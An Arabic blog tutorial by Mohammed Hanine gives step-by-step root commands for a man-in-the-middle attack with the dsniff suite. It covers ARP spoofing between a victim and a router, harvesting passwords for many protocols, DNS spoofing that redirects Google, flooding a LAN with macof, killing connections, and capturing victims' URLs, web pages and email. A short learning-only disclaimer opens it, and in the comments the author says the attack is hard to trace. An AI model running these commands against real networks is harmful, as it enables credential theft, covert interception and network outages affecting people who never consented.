إستعمال Dsniff هجوم MITM

قبل شرح ما هو Dsniff سأشرح القليل ما هو هجوم MITM (man-in-the-middle) ما يسمى الوسيط ألا وهي القدرة على قرائة أو التعديلات أو إضافة أو إزالة البيانات المرسلة بين طرفين بدون علم أي أحد منهما وهذا يوجب على المهاجم عمل وسيط بين تلك البيانات بهجوم لتمر به تلك المعلومات وهذا الهجوم يصعب التحكم به لكن يعلم الكثير في عمل شبكة أكثر متانة.
هي مجموعة من التطبيقات التي يمكنها التحكم بين طرفين لعمل وسيط لتمكن من عمل هجوم MITM ومن تلك التطبيقات يوجد ما يمكنه إعتراض كلمات المرور الخاصة ب http,ftp,telnet,smtp,pop … وأخرى يمكنها عمل تغيير في dns و أخرى يمكن التحكم في ما يتصفحه طرف من الطرفين وأخرى يمكن معرفة ما يرسل في msn
قبل البدئ رجاءا إقرأ هذا: هذا الشرح عمل خصيصا لعمل أرضية لشرحات أخرى ولا يحق لأحد إستعماله إلى لتعلم وكسب الخبرة وأي إستعمال غير أخلاقي ابرئ نفسي من كل معصية لله سبحانه وتعالى تكون عبر إستعمال هذا الشرح.
من أجل التعلم نكمل الشرح وقبل البدأ هذا البرنام يوجب مستخدم root للعمل

نقوم بتنصيبه.
# apt-get install dsniff
لمعرفة كل التطبيقات التي يمكن إستعمالها
# dpkg -L dsniff | grep bin
نعمل مثال
الروتر له ip 192.168.2.1
الحاسوب المراد الهجوم عليه 192.168.2.106
والمهاجم 192.168.2.10
ما نريده هو التحكم في البيانات المرسلة بين 192.168.2.106 و 192.168.2.1
وبعد المثل نقوم بتفعيل ip_forwarding بإضافة 1 إلى ملف /proc/sys/net/ipv4/ip_forward
# echo 1 > /proc/sys/net/ipv4/ip_forward
لمذا نفعل ذالك الملف؟ لكي لا يوقف بسبب الهجوم أنترنيت الضحية
قبل البدأ في توسط البينات علينا عمل هجوم بحزم ARP مزيفة تقوم على إعادة توجيه البيانات المرسلة من الضحية إلى الروتر ومن الروتر إلى الضحية
# arpspoof -i eth0 -t 192.168.2.1 192.168.2.106 2> /dev/null &
# arpspoof -i eth0 -t 192.168.2.106 192.168.2.1 2> /dev/null &

eth0 يمكن أن تكون أخرى إستعمل ifconfig لمعرفة منفذ الإتصال بالشبكة
2> /dev/null & لإستعمال نفس سطر الأوامر
لتأكد من عمل ذالك الهجوم
# tcpdump -i wlan0 -l -n tcp -A -s 128
لإيقاف الهجوم
# killall arpspoof
في حاسوب الضحية إذا وضعنا
arp -a
سنجد أن عنوان MAC الروتر هو نفسه الحاسوب المهاجم 192.168.2.10
dsniff لكلمات المرور يمكنه إيقاف كلمات المرور ل FTP, Telnet, HTTP, POP, NNTP, IMAP, SNMP, LDAP, Rlogin, NFS, SOCKS, X11, IRC, AIM, CVS, ICQ, Napster, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, y Oracle SQL*Net:
# dsniff -i eth0
dnsspoof تزييف ردود dns لهجومات تخدع الضحية للوصول إلى ip المطلوبة
# vim /usr/share/dsniff/dnsspoof.hosts
وهذا الملف على شكل
127.0.0.1 *.google.*
وهذا يجعل الضحية عند تصفح google يقوم بتغيير dns ليتصفح 127.0.0.1
وعمل هذا الهجوم يكون عبر أمر
# dnsspoof -i eth0 -f dnsspoof.hosts
filesnarf إلتقاط الملفات عبر NFS
# filesnarf -i eth0
macof غرق الشبكة عبر فيضان من عناوين عشوائية mac، يمكن ترك الشبكة المحلية متوقفة أو عديمة الفائدة
# macof -i eth0
msgsnarf هذا يضهر ضعف بعض أنضمة الرسائل الفورية، AOL,ICQ 2000,IRC,MSN و YAHOO
# msgsnarf -i eth0
sshmitm تحليل حركة المرور ssh الإصدار 1 و 2 ومحاولة المصادقة،طول كلمة المرور وطول الأوامر الخ …
tcpkill قتل إتصال مفعل وبتالي إجباره على إعادة بدء الإتصال مرة أخرى وبتالي حركة في نفس المكان قتل الإتصال ،
# tcpkill -i eth0 port 21 or port 22
tcpnice بطئ الإتصال إلى حد توقيفه
اurlsnarf تسجيل أي حركة في url الضحية معرفة كل المواقع التي يتصل بها
# urlsnarf -i eth0
webspy مشاهدة حركة موقع الضحية وفتحها على المتصفح الخاص بنا
# webspy -i eth0 192.168.2.106
webmitm عمل بروكسي شفاف وكل الإتصلات http و https تمر بنا وهكذا بإستعمال dnsspoof يمكن الإستلاء على كلمات المرور ومعلومات المرسلة عبر نماذج الوييب
mailsnarf التقاط كل مرور البريد الإلكتروني (Outlook, Thunderbird …)
# mailsnarf -i eth0
تحياتي الخاصة والقادم أفضل.

محمد حنين

الإسم الكامل محمد حنين أحد geek من أمد طويل ، مطور ويب، محب للحرية، مستعمل نضام لينوكس، وأخيرا مجرم باللغة العربية للأسف في وقتها. معلومات أكثر عني أو الإتصال بي Mohammed Hanine

You may also like...

2 تعليقان

  1. يقول mmed:

    من الشرح فهمت ان لا شيء يجب وضعه في اجهزة الضحايا! اي لن نرسل لهم اي شيء.
    هل هذا صحيح؟

    • يقول mohammed:

      نعم هو ذالك لا يتم تنصسب أي شيء في أجهزة الضحايا
      فهو هجوم يغيير إتجاه البيانات المرسلة من الضحية وهناك نقوم بأخذهم وهذا يصعب التحكم فيما قام بالهجوم والنيل منه.

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *